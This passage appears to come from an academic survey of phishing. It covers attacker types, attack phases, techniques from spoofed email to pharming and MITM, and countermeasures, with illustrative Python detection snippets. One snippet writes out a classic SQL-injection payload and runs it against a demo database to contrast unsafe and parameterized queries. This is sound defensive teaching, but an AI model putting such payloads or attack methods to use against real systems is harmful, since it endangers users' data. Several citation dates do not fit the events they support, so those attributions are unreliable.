▪ Serious Crackers: also known as Black Hats. These attackers can execute sophisticated attacks and develop worms and Trojans for their attack. They hijack people's accounts maliciously and steal credit card information, destroy important files, or sell compromised credentials for personal gains.

▪ Organized crime: this is the most organized and effective type of attacker, and it can inflict significant damage on victims. These groups hire serious crackers to conduct phishing attacks. Moreover, they can thoroughly trash the victim's identity and commit devastating frauds, as they have the skills, tools, and manpower. An organized cybercrime group is a team of expert hackers who share their skills to build complex attacks and to launch phishing campaigns against individuals and organizations. These groups offer their work as ‘crime as a service’ and they can be hired by terrorist groups, organizations, or individuals.

▪ Terrorists: due to our dependency on the internet for most activities, terrorist groups can easily conduct acts of terror remotely, which could have an adverse impact. These types of attacks are dangerous since the attackers do not fear any consequences, for instance going to jail. Terrorists could use the internet to maximum effect to create fear and violence, as it requires limited funds, resources, and effort compared to, for example, buying bombs and weapons in a traditional attack. Often, terrorists use spear phishing to launch their attacks for different purposes such as inflicting damage, cyber espionage, gathering information, locating individuals, and other vandalism purposes. Cyber espionage has been used extensively by cyber terrorists to steal sensitive information on national security, commercial information, and trade secrets, which can be used for terrorist activities. These types of crimes may target governments, organizations, or individuals.

Attack Preparation

After deciding on the targets and gathering information about them, phishers start to set up the attack by scanning for vulnerabilities to exploit. For example, the attacker might exploit a buffer overflow vulnerability to take control of target applications, create a DoS attack, or compromise computers. Moreover, “zero-day” software vulnerabilities, which are newly discovered vulnerabilities in software programs or operating systems, could be exploited directly before they are fixed ( Kayne, 2019 ). Another example is browser vulnerabilities: adding new features and updates to the browser might introduce new vulnerabilities into the browser software ( Ollmann, 2004 ). In 2005, attackers exploited a cross-domain vulnerability in Internet Explorer (IE) ( Symantic, 2019 ). The cross-domain security model is used to separate content from different sources in Microsoft IE. Attackers exploited a flaw in this model that enabled them to execute programs on a user's computer after running IE. According to US-CERT, hackers were actively exploiting this vulnerability. To carry out a phishing attack, attackers need a medium through which they can reach their target. Therefore, apart from planning the attack to exploit potential vulnerabilities, attackers choose the medium that will be used to deliver the threat to the victim and carry out the attack. These mediums could be the internet (social networks, websites, emails, cloud computing, e-banking, mobile systems), VoIP (phone calls), or text messages. For example, one of the actively used mediums is Cloud Computing (CC). CC has become one of the more promising technologies and has widely replaced conventional computing technologies. Despite the considerable advantages of CC, its adoption faces several controversial obstacles, including privacy and security issues ( CVEdetails, 2005 ). Because different customers could share the same resources in the cloud, virtualization vulnerabilities may be exploited by a malicious customer to perform security attacks on other customers’ applications and data ( Zissis and Lekkas, 2012 ). For example, in September 2014, private photos of some celebrities suddenly spread across the internet in one of the more serious data breaches. The investigation revealed that the iCloud accounts of the celebrities were breached ( Lehman and Vajpayee, 2011 ). According to Proofpoint, in 2017, attackers used Microsoft SharePoint to distribute malware through messages in hundreds of campaigns.

Attack Conducting Phase

This phase involves using attack techniques to deliver the threat to the victim, as well as the victim’s interaction with the attack, that is, whether or not they respond. After the victim's response, the attacker may compromise the system to collect the user's information using techniques such as injecting client-side script into webpages ( Johnson, 2016 ). Phishers can compromise hosts without any technical knowledge by purchasing access from hackers ( Abad, 2005 ). A threat is a possible danger that might exploit a vulnerability to compromise people’s security and privacy or cause possible harm to a computer system for malicious purposes. Threats could be malware, botnets, eavesdropping, unsolicited emails, and viral links. Several phishing techniques are discussed in the section Types and Techniques of Phishing Attacks .

Valuables Acquisition Phase

In this stage, the phisher collects information or valuables from victims and uses them illegally for making purchases, withdrawing money without the user’s knowledge, or selling the credentials on the black market. Attackers target a wide range of valuables from their victims, ranging from money to people’s lives. For example, attacks on online medical systems may lead to loss of life. Victims' data can be collected by phishers manually or through automated techniques ( Jakobsson et al., 2007 ).

Data collection can be conducted either during or after the victim’s interaction with the attacker. To collect data manually, simple techniques are used in which victims interact directly with the phisher, relying on relationships within social networks or other human deception techniques ( Ollmann, 2004 ). In automated data collection, several techniques can be used, such as the fake web forms used in web spoofing ( Dhamija et al., 2006 ). Additionally, the victim’s public data, such as the user’s profile in social networks, can be used to collect the background information required to initialize social engineering attacks ( Wenyin et al., 2005 ). In VoIP or phone attacks, techniques such as recorded messages are used to harvest the user's data ( Huber et al., 2009 ).

Types and Techniques of Phishing Attacks

Phishers conduct their attack either by using psychological manipulation of individuals into disclosing personal information (i.e., deceptive attack as a form of social engineering) or using technical methods. Phishers, however, usually prefer deceptive attacks by exploiting human psychology rather than technical methods. Figure 9 illustrates the types of phishing and techniques used by phishers to conduct a phishing attack. Each type and technique is explained in subsequent sections and subsections.

FIGURE 9 . Phishing attack types and techniques drawing upon existing phishing attacks.

Deceptive Phishing

Deceptive phishing is the most common type of phishing attack, in which the attacker uses social engineering techniques to deceive victims. In this type of phishing, a phisher uses either social engineering tricks, making up scenarios (e.g., a false account update or security upgrade), or technical methods (e.g., using legitimate trademarks, images, and logos) to lure the victim and convince them of the legitimacy of the forged email ( Jakobsson and Myers, 2006 ). By believing these scenarios, the user falls prey and follows the given link, which leads them to disclose their personal information to the phisher.

Deceptive phishing is performed through phishing emails, fake websites, phone phishing (scam calls and IM), social media, and many other mediums. The most common social phishing types are discussed below:

Phishing e-Mail

The most common threat posed by attackers is deceiving people via email communications, and this remains the most popular phishing type to date. A phishing email, or spoofed email, is a forged email sent from an untrusted source to thousands of victims at random. These fake emails claim to be from a person or financial institution that the recipient trusts in order to convince recipients to take actions that lead them to disclose their sensitive information. A more organized phishing email that targets a particular group or individuals within the same organization is called spear phishing. In this type, the attacker may gather information related to the victim, such as name and address, so that the email appears to come credibly from a trusted source ( Wang et al., 2008 ); this is linked to the planning phase of the phishing anatomy proposed in this article. A more sophisticated form of spear phishing is called whaling, which targets high-ranking people such as CEOs and CFOs. One example of a spear-phishing attack is the phishing email that compromised the Gmail account of Clinton campaign chairman John Podesta in early 2016 ( Parmar, 2012 ). Clone phishing is another type of email phishing, in which the attacker clones a legitimate, previously delivered email by spoofing the email address and reusing information related to the recipient, such as addresses from the legitimate email, while replacing links or adding malicious attachments ( Krawchenko, 2016 ). The basic scenario for this attack was illustrated previously in Figure 4 and can be described in the following steps.

1. The phisher sets up a fraudulent email containing a link or an attachment (planning phase).

2. The phisher executes the attack by sending a phishing email to the potential victim using an appropriate medium (attack conducting phase).

3. If clicked, the link directs the user to a fraudulent website; if the attachment is opened, malware is downloaded (interaction phase).

4. The malicious website prompts users to provide confidential information or credentials, which are then collected by the attacker and used for fraudulent activities (valuables acquisition phase).

Often, the phisher does not use the credentials directly; instead, they resell the obtained credentials or information on a secondary market ( Jakobsson and Myers, 2006 ). For instance, script kiddies might sell the credentials on the dark web.
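One signal that sometimes accompanies the spoofed and cloned emails described in this section is a mismatch between the domain shown in the From header and the domains in the Reply-To or Return-Path headers. The following Python sketch, built on the standard `email` package, extracts those domains. The function names and the sample message in the usage note are hypothetical, and a mismatch is only a hint: legitimate mailing lists and bulk senders also produce mismatches, so this is an illustration and not a reliable filter.

```python
from email import message_from_string
from email.utils import parseaddr


def sender_domains(raw_message: str) -> dict:
    """Return the domain found in each sender-related header ('' if absent)."""
    msg = message_from_string(raw_message)
    result = {}
    for header in ("From", "Reply-To", "Return-Path"):
        _, address = parseaddr(msg.get(header, ""))
        # Keep only the part after the last '@', lower-cased for comparison.
        result[header] = address.rpartition("@")[2].lower() if "@" in address else ""
    return result


def has_sender_mismatch(raw_message: str) -> bool:
    """True when the sender-related headers name more than one distinct domain."""
    domains = {d for d in sender_domains(raw_message).values() if d}
    return len(domains) > 1
```

For a message whose From header is `Example Bank <support@bank.example>` and whose Reply-To header is `helpdesk@attacker.example`, `has_sender_mismatch` returns `True`, because replies would go to a different domain than the one displayed.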

Spoofed Website

A spoofed website, also called a phishing website, is a website forged by phishers to appear genuine and to look similar to the legitimate website. An unsuspecting user is redirected to this website after clicking a link embedded within an email, through an advertisement (clickjacking), or in some other way. If the user continues to interact with the spoofed website, sensitive information will be disclosed and harvested by the phisher ( CSIOnsite, 2012 ).

Phone Phishing (Vishing and SMishing)

This type of phishing is conducted through phone calls or text messages, in which the attacker pretends to be someone the victim knows or another trusted source the victim deals with. A user may receive a convincing security alert message from a bank urging them to contact a given phone number, with the aim of getting the victim to share passwords, PINs, or any other Personally Identifiable Information (PII). The victim may be duped into clicking on an embedded link in the text message. The phisher could then take the credentials entered by the victim and use them to log in to the victim's instant messaging service to phish other people from the victim’s contact list. A phisher could also use Caller IDentification (CID) spoofing to dupe the victim into believing that the call is from a trusted source, or leverage internet protocol private branch exchange (IP PBX) tools, which are open-source, software-based tools that support VoIP ( Aburrous et al., 2008 ). A report from Fraud Watch International about phishing attack trends for 2019 anticipated an increase in SMishing in which the text message content is only viewable on a mobile device ( FraudWatchInternational, 2019 ).

Social Media Attack (Soshing, Social Media Phishing)

Social media is the new favorite medium for cybercriminals to conduct their phishing attacks. Social media threats include account hijacking, impersonation attacks, scams, and malware distribution. Detecting and mitigating these threats takes longer than detecting traditional methods, as social media exists outside of the network perimeter. For example, nation-state threat actors conducted an extensive series of social media attacks on Microsoft in 2014. Multiple Twitter accounts were affected by these attacks, and passwords and emails for dozens of Microsoft employees were revealed ( Ramzan, 2010 ). According to Kaspersky Lab, there were more than 3.7 million phishing attempts to visit fraudulent social network pages in the first quarter of 2018, of which 60% involved fake Facebook pages ( Raggo, 2016 ).

A report from the predictive email defense company Vade Secure about phishers’ favorites for quarter 1 and quarter 2 of 2019 stated that Soshing, primarily on Facebook and Instagram, saw a 74.7% increase, the highest quarter-over-quarter growth of any industry ( VadeSecure, 2021 ).

Technical Subterfuge

Technical subterfuge is the act of tricking individuals into disclosing their sensitive information by downloading malicious code into the victim's system. Technical subterfuge can be classified into the following types:

Malware-Based Phishing

As the name suggests, this is a type of phishing attack which is conducted by running malicious software on a user’s machine. The malware is downloaded to the victim’s machine, either by one of the social engineering tricks or technically by exploiting vulnerabilities in the security system (e.g., browser vulnerabilities) ( Jakobsson and Myers, 2006 ). Panda malware is one of the successful malware programs discovered by Fox-IT Company in 2016. This malware targets Windows Operating Systems (OS). It spreads through phishing campaigns and its main attack vectors include web injects, screenshots of user activity (up to 100 per mouse click), logging of keyboard input, Clipboard pastes (to grab passwords and paste them into form fields), and exploits to the Virtual Network Computing (VNC) desktop sharing system. In 2018, Panda malware expanded its targets to include cryptocurrency exchanges and social media sites ( F5Networks, 2018 ). There are many forms of Malware-based phishing attacks; some of them are discussed below:

Key Loggers and Screen Loggers

Loggers are a type of malware that phishers install either through Trojan horse email attachments or through direct download to the user’s personal computer. This software monitors data, records user keystrokes, and sends them to the phisher. Phishers use key loggers to capture sensitive information about victims, such as names, addresses, passwords, and other confidential data. Key loggers can also be used for non-phishing purposes, such as monitoring a child's use of the internet. Key loggers can be implemented in several ways: as a Browser Helper Object (BHO) that detects URL changes and logs information, and that enables the attacker to take control of IE's features; as a device driver that monitors keyboard and mouse input; and as a screen logger that monitors the user's input and display ( Jakobsson and Myers, 2006 ).

Viruses and Worms

A virus is a type of malware: a piece of code that spreads within another application or program by making copies of itself in a self-automated manner ( Jakobsson and Myers, 2006 ; F5Networks, 2018 ). Worms are similar to viruses but differ in how they execute: worms run by exploiting operating system vulnerabilities, without the need to modify another program. Viruses transfer from one computer to another with the document they are attached to, while worms transfer through the infected host file. Both viruses and worms can damage data and software or cause Denial-of-Service (DoS) conditions ( F5Networks, 2018 ).

Spyware

Spying software (spyware) is malicious code designed to track the websites visited by users in order to steal sensitive information and conduct a phishing attack. Spyware can be delivered through an email and, once installed on the computer, can take control of the device and either change its settings or gather information such as passwords, credit card numbers, or banking records, which can be used for identity theft ( Jakobsson and Myers, 2006 ).

Adware

Adware, also known as advertising-supported software ( Jakobsson and Myers, 2006 ), is a type of malware that shows the user endless pop-up windows with ads, which can harm the performance of the device. Adware can be annoying, but most of it is safe. Some adware, however, could be used for malicious purposes such as tracking the internet sites the user visits or even recording the user's keystrokes ( cisco, 2018 ).

Ransomware

Ransomware is a type of malware that encrypts the user's data after they run an executable program on the device. In this type of attack, the decryption key is held until the user pays a ransom (cisco, 2018). Ransomware is responsible for tens of millions of dollars in extortion annually. Worse still, it is hard to detect because new variants are continually developed, which helps it evade many antivirus and intrusion detection systems ( Latto, 2020 ). Ransomware is usually delivered to the victim's device through phishing emails. According to a report ( PhishMe, 2016 ), 93% of all phishing emails contained encryption ransomware. Phishing, as a social engineering attack, convinces victims to execute actions without knowing about the malicious program.

Rootkits

A rootkit is a collection of programs, typically malicious, that enables access to a computer or computer network. These toolsets are used by intruders to hide their actions from system administrators by modifying the code of system calls and changing their functionality ( Belcic, 2020 ). The term “rootkit” has negative connotations through its association with malware, and a rootkit is used by the attacker to alter existing system tools in order to escape detection. These kits enable individuals with little or no knowledge to launch phishing exploits. They contain code, mass emailing software (possibly with thousands of email addresses included), web development software, and graphic design tools. An example of a rootkit is the kernel kit. Kernel-level rootkits are created by replacing portions of the core operating system or adding new code via Loadable Kernel Modules (in Linux) or device drivers (in Windows) ( Jakobsson and Myers, 2006 ).

Session Hijackers

In this type, the attacker monitors the user’s activities by embedding malicious software within a browser component or via network sniffing. The monitoring aims to hijack the session so that the attacker can perform an unauthorized action with the hijacked session, such as a funds transfer, without the user's permission ( Jakobsson and Myers, 2006 ).

Web Trojans

Web Trojans are malicious programs that collect user’s credentials by popping up in a hidden way over the login screen ( Jakobsson and Myers, 2006 ). When the user enters the credentials, these programs capture and transmit the stolen credentials directly to the attacker ( Jakobsson et al., 2007 ).

Hosts File Poisoning

This is a way to trick a user into going to the phisher’s site by poisoning (changing) the hosts file. When the user types a particular website address in the URL bar, the web address is translated into a numeric (IP) address before the site is visited. To take the user to a fake website for phishing purposes, the attacker modifies the hosts file (or, similarly, the local DNS cache) so that the legitimate name is translated into the address of the attacker's server. This type of phishing is hard to detect even for smart and perceptive users ( Ollmann, 2004 ).
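To make the mechanism concrete, the following Python sketch parses hosts-file text (lines of the form `IP name [name ...]`, with `#` starting a comment) and reports any watched hostname that has been pinned to a non-loopback address. The function names, the watch list, and the sample addresses in the usage note are hypothetical; the sketch works on text passed in as a string, so it does not touch the real hosts file, and a pinned entry is not necessarily malicious.

```python
def parse_hosts(text: str) -> dict:
    """Map each hostname in hosts-file text to the IP address it is pinned to."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments, then skip blank lines
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            mapping[name.lower()] = ip
    return mapping


def suspicious_entries(text: str, watched: set) -> dict:
    """Return watched hostnames that the hosts file pins to a non-loopback address."""
    loopback = {"127.0.0.1", "::1", "0.0.0.0"}
    return {
        name: ip
        for name, ip in parse_hosts(text).items()
        if name in watched and ip not in loopback
    }
```

Given the text `203.0.113.10 www.bank.example` and a watch list containing `www.bank.example`, the sketch reports that entry, since a sensitive hostname would then resolve locally to whatever address the file names.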

System Reconfiguration Attack

In this form of phishing attack, the phisher manipulates the settings on a user’s computer for malicious purposes so that the information on the PC is compromised. System configurations can be changed using different methods, such as reconfiguring the operating system and modifying the user’s Domain Name System (DNS) server address. The wireless evil twin is an example of a system reconfiguration attack in which all of the user’s traffic is monitored via a malicious wireless Access Point (AP) ( Jakobsson and Myers, 2006 ).

Data Theft

Data theft is the unauthorized accessing and stealing of confidential information belonging to a business or individuals. Data theft can be performed by a phishing email that leads to the download of malicious code to the user's computer, which in turn steals confidential information stored on that computer directly ( Jakobsson and Myers, 2006 ). Stolen information such as passwords, social security numbers, credit card information, sensitive emails, and other personal data could be used directly by a phisher or indirectly by selling it for different purposes.

Domain Name System Based Phishing (Pharming)

Any form of phishing that interferes with the domain name system so that the user will be redirected to the malicious website by polluting the user's DNS cache with wrong information is called DNS-based phishing. Although the host’s file is not a part of the DNS, the host’s file poisoning is another form of DNS based phishing. On the other hand, by compromising the DNS server, the genuine IP addresses will be modified which results in taking the user unwillingly to a fake location. The user can fall prey to pharming even when clicking on a legitimate link because the website’s domain name system (DNS) could be hijacked by cybercriminals ( Jakobsson and Myers, 2006 ).

Content Injection Phishing

Content-injection phishing refers to inserting false content into a legitimate site. This malicious content could misdirect the user to fake websites, leading users to disclose their sensitive information to the hacker, or it could lead to malware being downloaded onto the user's device ( Jakobsson and Myers, 2006 ). The malicious content can be injected into a legitimate site in three primary ways:

1. The hacker exploits a security vulnerability and compromises a web server.

2. The hacker exploits a Cross-Site Scripting (XSS) vulnerability, a programming flaw that enables attackers to insert client-side scripts into web pages that will be viewed by visitors to the targeted site.

3. The hacker exploits a Structured Query Language (SQL) injection vulnerability, which allows hackers to steal information from the website's database by executing database commands on a remote server.
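
To illustrate the third route, the following minimal Python sketch (not taken from the cited sources) contrasts a query built by string concatenation with a parameterized one, using the standard-library sqlite3 module. The table layout, the function names, and the payload are hypothetical and chosen only for illustration.

```python
import sqlite3


def make_demo_db():
    # In-memory database with a hypothetical "users" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "a-secret"), ("bob", "b-secret")],
    )
    return conn


def find_user_unsafe(conn, name):
    # Vulnerable: user input is concatenated straight into the SQL text,
    # so quotes in the input can change the structure of the query.
    query = "SELECT name, secret FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, name):
    # Parameterized: the input is bound as data and never parsed as SQL.
    return conn.execute(
        "SELECT name, secret FROM users WHERE name = ?", (name,)
    ).fetchall()


payload = "nobody' OR '1'='1"               # classic injection string
conn = make_demo_db()
leaked = find_user_unsafe(conn, payload)    # condition is always true
blocked = find_user_safe(conn, payload)     # no user has this literal name
print(len(leaked), len(blocked))
```

In this sketch the concatenated query returns every row in the table, whereas the parameterized query treats the payload as an ordinary (non-matching) name.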

Man-In-The-Middle Phishing

The Man-in-the-Middle (MITM) attack is a form of phishing in which the phisher inserts themselves into the communication between two parties (i.e., the user and the legitimate website) and tries to obtain information from both parties by intercepting the victim's communications ( Ollmann, 2004 ), so that messages go to the attacker instead of directly to the legitimate recipients. In a MITM attack, the attacker records the information and misuses it later. The attack is conducted by redirecting the user to a malicious server through techniques such as Address Resolution Protocol (ARP) poisoning, DNS spoofing, Trojan key loggers, and URL obfuscation ( Jakobsson and Myers, 2006 ).

Search Engine Phishing

In this phishing technique, the phisher creates malicious websites with attractive offers and uses Search Engine Optimization (SEO) tactics to have them indexed legitimately so that they appear to users searching for products or services. This is also known as black hat SEO ( Jakobsson and Myers, 2006 ).

URL and HTML Obfuscation Attacks

In most phishing attacks, phishers aim to convince a user to click on a given link that connects the victim to a malicious phishing server instead of the intended destination server. This is the most popular technique used by today's phishers. The attack is performed by obfuscating the real link (URL) that the user intends to connect to; that is, the attacker tries to make their web address look like the legitimate one. Bad domain names and host name obfuscation are common methods used by attackers to fake an address ( Ollmann, 2004 ).
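
As a minimal illustration of host name obfuscation, the sketch below uses Python's standard urllib.parse module to recover the host that a browser would actually contact. The domains (bank.example, attacker.example), the IP address, and the helper names are hypothetical and serve only as examples.

```python
from urllib.parse import urlsplit


def real_host(url):
    """Return the host component that the URL actually points to."""
    return urlsplit(url).hostname


def belongs_to(url, trusted_domain):
    """True only if the real host is the trusted domain or one of its subdomains."""
    host = real_host(url) or ""
    return host == trusted_domain or host.endswith("." + trusted_domain)


examples = [
    "https://www.bank.example/login",
    # Text before "@" is user information, not the host.
    "http://www.bank.example@203.0.113.7/login",
    # The trusted name appears only as a misleading subdomain prefix.
    "http://www.bank.example.attacker.example/login",
]
results = [(real_host(u), belongs_to(u, "bank.example")) for u in examples]
for row in results:
    print(row)
```

Only the first URL resolves to the trusted domain; the other two merely display its name while pointing elsewhere.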

Countermeasures

A range of solutions has been discussed and proposed by researchers to overcome the problem of phishing, but there is still no single solution that can be trusted to mitigate these attacks ( Hong, 2012 ; Boddy, 2018 ; Chanti and Chithralekha, 2020 ). The phishing countermeasures proposed in the literature can be categorized into three major defense strategies. The first line of defense is human-based solutions, which educate end-users to recognize phishing and avoid taking the bait. The second line of defense is technical solutions, which involve preventing the attack at early stages, such as at the vulnerability level, so that the threat does not materialize at the user's device (which means decreasing human exposure), and detecting the attack once it is launched, either at the network level or at the end-user device. This also includes applying specific techniques to track down the source of the attack (for example, identifying newly registered domains that closely match well-known domain names). The third line of defense is the use of law enforcement as a deterrent control. These approaches can be combined to create much stronger anti-phishing solutions. The above solutions are discussed in detail below.
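
The domain-matching idea mentioned above (spotting newly registered domains that closely resemble well-known ones) can be sketched as follows. This is an illustrative assumption rather than a method from the cited studies: it uses difflib.SequenceMatcher from the Python standard library as the similarity measure, and the watch list and the 0.8 threshold are arbitrary choices.

```python
from difflib import SequenceMatcher

# Hypothetical watch list of well-known domains to protect.
WELL_KNOWN = ["paypal.com", "ebay.com"]


def closest_brand(domain, brands=WELL_KNOWN):
    """Return (similarity, brand) for the most similar well-known domain."""
    scored = [(SequenceMatcher(None, domain, b).ratio(), b) for b in brands]
    return max(scored)


def is_lookalike(domain, threshold=0.8):
    """Flag domains that are very similar to, but not identical to, a brand."""
    domain = domain.lower()
    score, brand = closest_brand(domain)
    return domain != brand and score >= threshold


for candidate in ["paypa1.com", "paypal.com", "example.org"]:
    print(candidate, is_lookalike(candidate))
```

A production system would more likely combine several signals (registration date, homoglyph tables, edit distance); the single ratio used here is only meant to make the idea concrete.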

Human Education (Improving User Awareness About Phishing)

Human education is an effective countermeasure for avoiding and preventing phishing attacks. Awareness and training form the first line of defense in the proposed methodology for fighting phishing, even though they do not ensure complete protection ( Hong, 2012 ). End-user education reduces users' susceptibility to phishing attacks and complements other technical solutions. According to the analysis carried out in ( Bailey et al., 2008 ), 95% of phishing attacks are caused by human error; nonetheless, existing phishing detection training is not enough to combat current sophisticated attacks. In the study presented by Khonji et al. (2013) , security experts disagree about the effectiveness and usability of user education. Some security experts claim that user education is not effective because security is not the main goal for users and users have no motivation to educate themselves about phishing ( Scaife et al., 2016 ), while others maintain that user education can be effective if designed properly ( Evers, 2006 ; Whitman and Mattord, 2012 ). Moreover, user training has been mentioned by many researchers as an effective way to protect users when they are using online services ( Dodge et al., 2007 ; Salem et al., 2010 ; Chanti and Chithralekha, 2020 ). To detect and avoid phishing emails, a combined training approach was proposed by the authors of ( Salem et al., 2010 ). The proposed solution uses a combination of tools and human learning, wherein a security awareness program is introduced to the user as a first step. The second step is using an intelligent system that detects the attacks at the email level. After that, the emails are classified by a fuzzy logic-based expert system. The main criticism of this method is that the study chooses only limited characteristics of the emails as distinguishing features ( Kumaraguru et al., 2010 ; CybintCyberSolutions, 2018 ).
Moreover, the majority of phishing training programs focus on how to recognize and avoid phishing emails and websites, while other threatening phishing types, such as voice phishing and malware or adware phishing, receive less attention. The authors in ( Salem et al., 2010 ) found that the most widely used solutions for educating people are not useful if users ignore the notifications/warnings about fake websites. User training should follow three major directions. The first is awareness training through seminars or online courses for both employees within organizations and individuals. The second is using mock phishing attacks to test users' vulnerability and allow them to assess their own knowledge about phishing. However, only 38% of global organizations claim they are prepared to handle a sophisticated cyber-attack ( Kumaraguru et al., 2010 ). Wombat Security’s State of the Phish™ Report 2018 showed that approximately two-fifths of American companies use computer-based online awareness training and simulated phishing attacks as educational tools on a monthly basis, while just 15% of United Kingdom firms do so ( CybintCyberSolutions, 2018 ). The third direction is educating people by developing games that teach them about phishing. The game developer should take different aspects into consideration before designing the game, such as audience age and gender, because people's susceptibility to phishing varies. The authors of the study ( Sheng et al., 2007 ) developed a game called Anti-Phishing Phil that trains users to identify phishing attacks by teaching them about phishing web pages, and then tested users to evaluate the efficiency and effectiveness of the game. The results showed that the game participants improved their ability to identify phishing by 61%, indicating that interactive games might turn out to be an enjoyable way of educating people.
Although user education and training can be very effective in mitigating security threats, phishing is becoming more complex, and cybercriminals can fool even security experts by creating convincing spear phishing emails via social media. Therefore, individual users and employees must have at least basic knowledge about dealing with suspicious emails and reporting them to IT staff and the relevant authorities. In addition, phishers change their strategies continuously, which makes it harder for organizations, especially small/medium enterprises, to afford the cost of educating their employees. With millions of people logging on to their social media accounts every day, social media is phishers' favorite medium for deceiving their victims. For example, phishers are taking advantage of the pervasiveness of Facebook to set up creative phishing attacks utilizing the Facebook Login feature, which enables the phisher to compromise all of the user's accounts that share the same credentials (VadeSecure). Social networks have taken some countermeasures to reduce suspicious activities on social media, such as two-factor authentication for logging in, which is required by Facebook, and machine-learning techniques used by Snapchat to detect and prevent suspicious links sent within the app ( Corrata, 2018 ). However, countermeasures to control social media phishing (Soshing) and phone phishing attacks might include:

• Install anti-virus and anti-spam software as a first action and keep it up to date to detect and prevent any unauthorized access.

• Educate yourself about recent information on phishing, the latest trends, and countermeasures.

• Never click on hyperlinks attached to a suspicious email, post, tweet, or direct message.

• Never trust social media; do not give any sensitive information over the phone or to a non-trusted account. Do not accept friend requests from people you do not know.

• Use a unique password for each account.

Training and educating users is an effective anti-phishing countermeasure and has already shown promising initial results. The main downside of this solution is that it demands high costs ( Dodge et al., 2007 ). Moreover, this solution requires basic knowledge in computer security among trained users.

Technical Solutions

The proposed technical solutions for detecting and blocking phishing attacks can be divided into two major approaches: non-content based solutions and content-based solutions ( Le et al., 2006 ; Bin et al., 2010 ; Boddy, 2018 ). Both approaches are briefly described in this section. Non-content based methods include blacklists and whitelists that classify fake emails or webpages based on information that is not part of the email or the webpage, such as URL and domain name features ( Dodge et al., 2007 ; Ma et al., 2009 ; Bin et al., 2010 ; Salem et al., 2010 ). In the blacklist and whitelist approaches, a list of known URLs and sites is maintained, and the website under scrutiny is checked against such a list in order to be classified as a phishing or legitimate site. The downside of this approach is that it will not identify all phishing websites, because once a phishing site is taken down, the phisher can easily register a new domain ( Miyamoto et al., 2009 ). Content-based methods classify the page or the email relying on the information within its content, such as text, images, HTML, JavaScript, and Cascading Style Sheets (CSS) code ( Zhang et al., 2007 ; Maurer and Herzner, 2012 ). Content-based solutions involve Machine Learning (ML), heuristics, visual similarity, and image processing methods ( Miyamoto et al., 2009 ; Chanti and Chithralekha, 2020 ). Finally, multifaceted methods apply a combination of the previous approaches to detect and prevent phishing attacks ( Afroz and Greenstadt, 2009 ). For email filtering, ML techniques are commonly used; for example, in 2007 the first email phishing filter was developed by the authors in ( Fette et al., 2007 ). This technique uses a set of features such as URLs that use different domain names. Spam filtering techniques ( Cormack et al., 2011 ) and statistical classifiers ( Bergholz et al., 2010 ) are also used to identify a phishing email.
Authentication and verification technologies are also used in spam email filtering as an alternative to heuristic methods. For example, the Sender Policy Framework (SPF) verifies whether a sender is valid when accepting mail from a remote mail server or email client ( Deshmukh and raddha Popat, 2017 ).
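
The list-based (non-content) approach described above can be sketched in a few lines of Python. The host names, the list contents, and the function name are hypothetical; real deployments rely on continuously updated feeds rather than hard-coded sets.

```python
from urllib.parse import urlsplit

# Hypothetical lists; in practice these would come from maintained feeds.
BLACKLIST = {"login-bank.example"}   # known phishing hosts
WHITELIST = {"www.bank.example"}     # known legitimate hosts


def classify(url):
    """Classify a URL by looking up its host in the two lists."""
    host = (urlsplit(url).hostname or "").lower()
    if host in BLACKLIST:
        return "phishing"
    if host in WHITELIST:
        return "legitimate"
    return "unknown"


print(classify("http://login-bank.example/verify"))   # listed phishing host
print(classify("https://www.bank.example/"))          # listed legitimate host
print(classify("http://login-bank2.example/verify"))  # freshly registered host
```

The last call shows the limitation noted in the text: a newly registered domain appears on neither list, so a purely list-based check cannot label it.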

Technical anti-phishing solutions are available at different levels of the delivery chain, such as mail servers and clients, Internet Service Providers (ISPs), and web browser tools. Drawing on the anatomy proposed in the section Proposed Phishing Anatomy, the authors categorize technical solutions into the following approaches:

1. Techniques to detect the attack after it has been launched, such as scanning the web to find fake websites. For example, content-based phishing detection approaches are heavily deployed on the Internet. Features from website elements such as images, URLs, and text content are analyzed using rule-based approaches and Machine Learning that examine the presence of special characters (@), IP addresses instead of the domain name, prefix/suffix, HTTPS in the domain part, and other features ( Jeeva and Rajsingh, 2016 ). Fuzzy Logic (FL) has also been used as an anti-phishing model to help classify websites as legitimate or ‘phishy’, as this model deals with intervals rather than specific numeric values ( Aburrous et al., 2008 ).

2. Techniques to prevent the attack from reaching the user's system. Phishing prevention is an important step in defending against phishing because it blocks the user from seeing and dealing with the attack. In email phishing, anti-spam software tools can block suspicious emails. Phishers usually send an email that looks genuine and dupes the user into opening an attachment or clicking on a link. Some of these emails pass the spam filter because phishers use misspelled words. Therefore, techniques that detect fake emails by checking spelling and grammar are increasingly used to prevent such emails from reaching the user's mailbox. The authors of the study ( Fette et al., 2007 ) developed a new classification algorithm based on the Random Forest algorithm after exploring email phishing using the C4.5 decision tree generator algorithm. The developed method, called "Phishing Identification by Learning on Features of Email Received" (PILFER), can classify phishing emails based on various features such as IP-based URLs, the number of links in the HTML part(s) of an email, the number of domains, the number of dots, nonmatching URLs, and the presence of JavaScript. The developed method showed high accuracy in detecting phishing emails ( Afroz and Greenstadt, 2009 ).

3. Corrective techniques that take down the compromised website by requesting the website's Internet Service Provider (ISP) to shut down the fake website in order to prevent more users from falling victim to phishing ( Moore and Clayton, 2007 ; Chanti and Chithralekha, 2020 ). ISPs are responsible for taking down fake websites. Removing compromised and illegal websites is a complex process; many entities are involved, including private companies, self-regulatory bodies, government agencies, volunteer organizations, law enforcement, and service providers. Usually, illegal websites are taken down by takedown orders, which are issued by courts or, in some jurisdictions, by law enforcement. Alternatively, they can be voluntarily taken down by the providers themselves as a result of issued takedown notices ( Moore and Clayton, 2007 ; Hutchings et al., 2016 ). According to the PhishLabs report ( PhishLabs, 2019 ), taking down phishing sites is helpful but not completely effective, as these sites can remain live for days, stealing customers' credentials before the attack is detected.

